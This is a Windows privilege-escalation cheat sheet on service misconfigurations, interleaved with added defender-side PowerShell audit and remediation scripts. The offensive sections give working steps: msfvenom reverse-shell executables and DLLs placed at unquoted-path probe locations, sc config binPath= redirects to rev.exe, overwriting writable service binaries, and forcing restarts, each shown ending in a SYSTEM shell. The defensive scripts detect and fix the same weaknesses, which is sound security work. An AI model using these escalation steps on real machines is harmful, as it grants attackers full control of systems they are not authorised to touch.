SERVICE MISCONFIGURATIONS

List all services

See all services — Look for non-default services

sc queryex type= service state= all
Get-Service
wmic service list brief
Example Output
sc queryex type= service state= all | findstr /i "SERVICE_NAME DISPLAY_NAME STATE"
SERVICE_NAME: CustomSvc
DISPLAY_NAME: Custom Application
STATE: 4 RUNNING
(Find non-default services to investigate)

Unquoted service paths

Paths with spaces, no quotes — C:\Program Files\My App\svc.exe = hijack

wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows"
Example Output
wmic service get name,pathname | findstr /i /v "C:\Windows"
CustomSvc  C:\Program Files\My App\service.exe

Path has spaces + no quotes = hijackable
Place: C:\Program Files\My.exe
Restart service -> runs your exe as SYSTEM

Exploit unquoted path

Windows tries each space as path end — Restart service to trigger

If path: C:\Program Files\My App\service.exe
Place malicious exe at: C:\Program.exe
or: C:\Program Files\My.exe
Example Output
Path: C:\Program Files\My App\service.exe

msfvenom -p windows/x64/shell_reverse_tcp ... -f exe -o 'C:\Program Files\My.exe'

sc stop CustomSvc
sc start CustomSvc

Attacker:
C:\> whoami
nt authority\system
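Added defender-side example, not from the original cheat sheet: the unquoted-path check above as an audit function plus a fix function. It generalizes the two probe paths shown for C:\Program Files\My App\service.exe to any number of spaces, listing for each service the file names Windows would try before the real executable (those are the directories whose ACLs must block file creation), and it quotes the path in place through the Win32_Service.Change method instead of editing the registry. Assumes Windows PowerShell 5.1 or later and, for the repair, an elevated session; function names are my own.

```powershell
# Added example (not the cheat sheet's own code). Assumes Windows PowerShell 5.1+.

function Get-UnquotedServicePath {
    # Flag services whose executable path is unquoted and contains a space.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $p = $_.PathName
            $p -and ($p -notmatch '^\s*"') -and ($p -match '\.exe') -and
            (($p -replace '^(.*?\.exe).*$', '$1') -match '\s')
        } |
        ForEach-Object {
            $exe = $_.PathName -replace '^(.*?\.exe).*$', '$1'
            # CreateProcess tries every space-delimited prefix of the path before
            # the real one, so each prefix directory needs a write-ACL check (icacls).
            $parts = $exe -split '\s+'
            $probe = for ($i = 1; $i -lt $parts.Count; $i++) {
                ($parts[0..($i - 1)] -join ' ') + '.exe'
            }
            [pscustomobject]@{
                Name        = $_.Name
                StartMode   = $_.StartMode
                RunsAs      = $_.StartName
                PathName    = $_.PathName
                Executable  = $exe
                ProbedFirst = ($probe -join '; ')
            }
        }
}

function Repair-UnquotedServicePath {
    # Wrap the executable portion in quotes; equivalent to
    # sc config <name> binPath= "\"C:\...\svc.exe\" <args>" but without cmd quoting pain.
    param([Parameter(Mandatory)][string]$Name)
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { throw "service $Name not found" }
    if ($svc.PathName -match '^\s*"') { return $svc.PathName }   # already quoted
    $exe   = $svc.PathName -replace '^(.*?\.exe).*$', '$1'
    $rest  = $svc.PathName.Substring($exe.Length)                # arguments, if any
    $fixed = '"' + $exe + '"' + $rest
    $r = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{ PathName = $fixed }
    if ($r.ReturnValue -ne 0) { throw "Change failed with code $($r.ReturnValue)" }
    return $fixed
}

# Usage: list findings, then quote a specific service (takes effect on next start)
Get-UnquotedServicePath | Format-Table Name, RunsAs, Executable, ProbedFirst -AutoSize
# Repair-UnquotedServicePath -Name CustomSvc
```

For the cheat sheet's example path the ProbedFirst column reads "C:\Program.exe; C:\Program Files\My.exe", the same two locations listed above; C:\ is normally not writable by standard users, but C:\Program Files\ subdirectories created by installers sometimes are, which is what the icacls check is for.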

Weak service permissions

Can you modify service config? — Change binPath to your payload

accesschk.exe -uwcqv * /accepteula
or: sc qc <service_name>
Example Output
accesschk.exe -uwcqv "Everyone" * /accepteula
RW CustomService
  SERVICE_ALL_ACCESS

sc config CustomService binPath= "C:\temp\rev.exe"
sc stop CustomService
sc start CustomService
(Shell as SYSTEM)

Modify service binary path

Point service to your payload — Runs as service account (often SYSTEM)

sc config <service> binPath= "C:\temp\rev.exe"
sc stop <service>
sc start <service>
Example Output
sc config CustomSvc binPath= "C:\temp\rev.exe"
[SC] ChangeServiceConfig SUCCESS

sc stop CustomSvc
sc start CustomSvc

Attacker:
C:\> whoami
nt authority\system
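Added defender-side example, not from the cheat sheet, covering both the weak-permissions and the binPath sections above: reproduce the accesschk check with built-in tooling by parsing the SDDL that sc sdshow prints and reporting every service whose DACL grants SERVICE_CHANGE_CONFIG, DELETE, WRITE_DAC, WRITE_OWNER or a generic write/all right to Everyone, Authenticated Users, Users, Interactive or Anonymous. Those are exactly the rights that let a low-privilege account run the sc config binPath= step. Assumes Windows PowerShell 5.1 or later; the function names and the sample SDDL string are constructed.

```powershell
# Added example, not the cheat sheet's own code. Assumes Windows PowerShell 5.1+.

# Service access rights in SDDL form: symbolic two-letter tokens, and the raw
# mask bits sc.exe prints as hex when a mask does not map to tokens.
$DangerousTokens = @{ DC = 'SERVICE_CHANGE_CONFIG'; SD = 'DELETE'; WD = 'WRITE_DAC'
                      WO = 'WRITE_OWNER'; GW = 'GENERIC_WRITE'; GA = 'GENERIC_ALL' }
$DangerousBits   = @{ SERVICE_CHANGE_CONFIG = 0x2; DELETE = 0x10000; WRITE_DAC = 0x40000
                      WRITE_OWNER = 0x80000; GENERIC_WRITE = 0x40000000; GENERIC_ALL = 0x10000000 }
# Well-known SIDs that should never hold those rights on a service
$LowPrivSids = @{ WD = 'Everyone'; AU = 'Authenticated Users'; BU = 'BUILTIN\Users'
                  IU = 'INTERACTIVE'; AN = 'ANONYMOUS' }

function Test-ServiceSddl {
    param([Parameter(Mandatory)][string]$Name,
          [Parameter(Mandatory)][string]$Sddl)
    # Only the DACL matters; each ACE is (type;flags;rights;objguid;inhguid;sid)
    if (-not ($Sddl -match 'D:(?<d>.*?)(?:S:|$)')) { return }
    $dacl = $Matches.d
    foreach ($ace in [regex]::Matches($dacl, '\(([^)]*)\)')) {
        $f = $ace.Groups[1].Value -split ';'
        if ($f.Count -lt 6 -or $f[0] -ne 'A') { continue }      # allow ACEs only
        $rights = $f[2]; $sid = $f[5]
        if (-not $LowPrivSids.ContainsKey($sid)) { continue }
        if ($rights -match '^0x') {
            $mask = [Convert]::ToInt64($rights.Substring(2), 16)
            $hits = $DangerousBits.Keys | Where-Object { $mask -band $DangerousBits[$_] }
        } else {
            # Split the token string in two-character steps; never substring-match it
            $hits = [regex]::Matches($rights, '..') |
                ForEach-Object { $DangerousTokens[$_.Value] } | Where-Object { $_ }
        }
        if ($hits) {
            [pscustomobject]@{ Service = $Name; Principal = $LowPrivSids[$sid]
                               Rights = ($hits -join ', '); Ace = $ace.Value }
        }
    }
}

function Get-WeakServiceAcl {
    # Live scan: pull the SDDL of every installed service through sc.exe sdshow
    foreach ($svc in Get-Service) {
        $sddl = ((& sc.exe sdshow $svc.Name 2>$null) -join '').Trim()
        if ($sddl -match 'D:') { Test-ServiceSddl -Name $svc.Name -Sddl $sddl }
    }
}

# Constructed sample: SYSTEM and Administrators are normal, the Everyone ACE is the bug
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
          '(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
Test-ServiceSddl -Name 'CustomService' -Sddl $sample | Format-List
# Get-WeakServiceAcl | Format-Table -AutoSize
```

On the sample the only finding is Principal Everyone with SERVICE_CHANGE_CONFIG, DELETE, WRITE_DAC and WRITE_OWNER, which is the "RW CustomService / SERVICE_ALL_ACCESS" line accesschk prints above. The fix is to reset the DACL so that only SYSTEM and Administrators hold DC, WD and WO, for example with sc sdset using an SDDL copied from a correctly configured service.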

Writable service binary

Replace the actual binary — Overwrite with reverse shell

icacls "C:\path\to\service.exe"
Look for: (F) or (M) for your user
Example Output
icacls C:\custom\svc.exe
BUILTIN\Users:(F)  <- FULL CONTROL!

copy C:\temp\rev.exe C:\custom\svc.exe /Y
sc stop CustomSvc
sc start CustomSvc
(Your payload runs as SYSTEM)

DLL hijacking (services)

Service loads missing DLL — DLL runs as service user

Process Monitor: filter for NAME NOT FOUND on .dll
Place malicious DLL in search path
Example Output
Process Monitor filter: Result=NAME NOT FOUND, Path ends with .dll
CustomSvc.exe -> C:\custom\missing.dll NOT FOUND

msfvenom -p windows/x64/shell_reverse_tcp ... -f dll -o C:\custom\missing.dll
Restart service -> shell as SYSTEM
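Added defender-side example, not from the cheat sheet, covering the writable-binary and DLL-hijacking sections above: for every service, read the ACL of the executable and of the directory it lives in, and report any Allow entry that gives Everyone, Users, Authenticated Users or Interactive a write-class right. A writable file means the binary itself can be swapped; a writable directory means a DLL can be dropped next to it, which is the Process Monitor NAME NOT FOUND case. Assumes Windows PowerShell 5.1 or later, run elevated so every ACL is readable; function names are my own.

```powershell
# Added example, not the cheat sheet's own code. Assumes Windows PowerShell 5.1+.

$LowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
           'NT AUTHORITY\INTERACTIVE'
# Rights that allow replacing or deleting the file, or rewriting its ACL; the two
# extra bits are GENERIC_ALL and GENERIC_WRITE, which some ACEs still carry un-mapped.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership' -bor 0x10000000 -bor 0x40000000

function Get-WeakPathAcl {
    # Emit one object per Allow ACE that gives a low-privilege principal a write-class right
    param([Parameter(Mandatory)][string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($LowPriv -notcontains $rule.IdentityReference.Value) { continue }
        if (([int]$rule.FileSystemRights -band $WriteMask) -eq 0) { continue }
        [pscustomobject]@{ Path = $Path; Principal = $rule.IdentityReference.Value
                           Rights = $rule.FileSystemRights }
    }
}

function Get-ServiceExecutable {
    # Strip quotes and arguments from a service PathName, keeping just the .exe
    param([string]$PathName)
    if (-not $PathName) { return $null }
    if ($PathName -match '^\s*"(?<exe>[^"]+)"') { return $Matches.exe }
    if ($PathName -match '^(?<exe>.*?\.exe)') { return $Matches.exe }
    return ($PathName -split '\s+')[0]
}

function Find-WritableServiceBinary {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $exe = Get-ServiceExecutable $_.PathName
        if (-not $exe) { return }
        $svcName = $_.Name
        # The file itself (binary replacement) and its directory (DLL planting)
        foreach ($p in @($exe, (Split-Path -Path $exe -Parent))) {
            Get-WeakPathAcl -Path $p | ForEach-Object {
                $_ | Add-Member -NotePropertyName Service -NotePropertyValue $svcName -PassThru
            }
        }
    }
}

Find-WritableServiceBinary | Format-Table Service, Path, Principal, Rights -AutoSize
```

The cheat sheet's "BUILTIN\Users:(F)" case shows up here as Principal BUILTIN\Users with Rights FullControl on the file; a directory row with Modify or Write for Users is the DLL-planting variant. Remediation is to reset the path to the usual SYSTEM/Administrators full control and Users read-and-execute, e.g. with icacls /reset and /inheritance:e on the service directory.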

Service restart permissions

Need to trigger the service — Some need admin to restart

sc stop <service>
sc start <service>
or reboot if you can
Example Output
sc stop CustomSvc
[SC] OpenService FAILED 5:

Access is denied.

Try: shutdown /r /t 0
OR wait for scheduled restart
OR: sc config CustomSvc start= auto
(Service restarts after reboot)
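Added defender-side example, not from the cheat sheet: the two System-log events that the start-type and new-service tricks above leave behind, 7040 (start type changed, which is what sc config start= auto produces) and 7045 (new service installed, with its ImagePath). The function normalizes both into one record with the SID of the account that made the change, and the usage line keeps 7040 entries plus any 7045 whose binary sits outside C:\Windows. Assumes an elevated Windows PowerShell 5.1 or later session; the 24-hour default window and the function name are my own choices.

```powershell
# Added example, not the cheat sheet's own code. Assumes Windows PowerShell 5.1+, elevated.

function Get-ServiceChangeEvents {
    param([int]$Hours = 24)
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'System'
        Id        = 7040, 7045
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Pull the named EventData fields out of the event XML
        $x = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $x.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        switch ($e.Id) {
            7045 {
                # New service: ServiceName, ImagePath and the account it runs as
                [pscustomobject]@{ Time = $e.TimeCreated; Id = 7045; Service = $data.ServiceName
                                   Detail = $data.ImagePath; RunsAs = $data.AccountName
                                   ChangedBy = $e.UserId }
            }
            7040 {
                # Start type changed: param2 -> param3, param4 is the service key name
                [pscustomobject]@{ Time = $e.TimeCreated; Id = 7040; Service = $data.param4
                                   Detail = "$($data.param2) -> $($data.param3)"; RunsAs = $null
                                   ChangedBy = $e.UserId }
            }
        }
    }
}

# Usage: all start-type changes, plus new services installed outside C:\Windows
Get-ServiceChangeEvents -Hours 72 |
    Where-Object { $_.Id -eq 7040 -or $_.Detail -notmatch '^"?C:\\Windows\\' } |
    Sort-Object Time | Format-Table -AutoSize
```

A 7040 "demand start -> auto start" for a non-default service, or a 7045 whose ImagePath points into C:\temp or a user profile, is worth triage; binPath changes made with sc config do not produce a System event of their own, so to see those enable object-access auditing on HKLM\SYSTEM\CurrentControlSet\Services and watch Security event 4657.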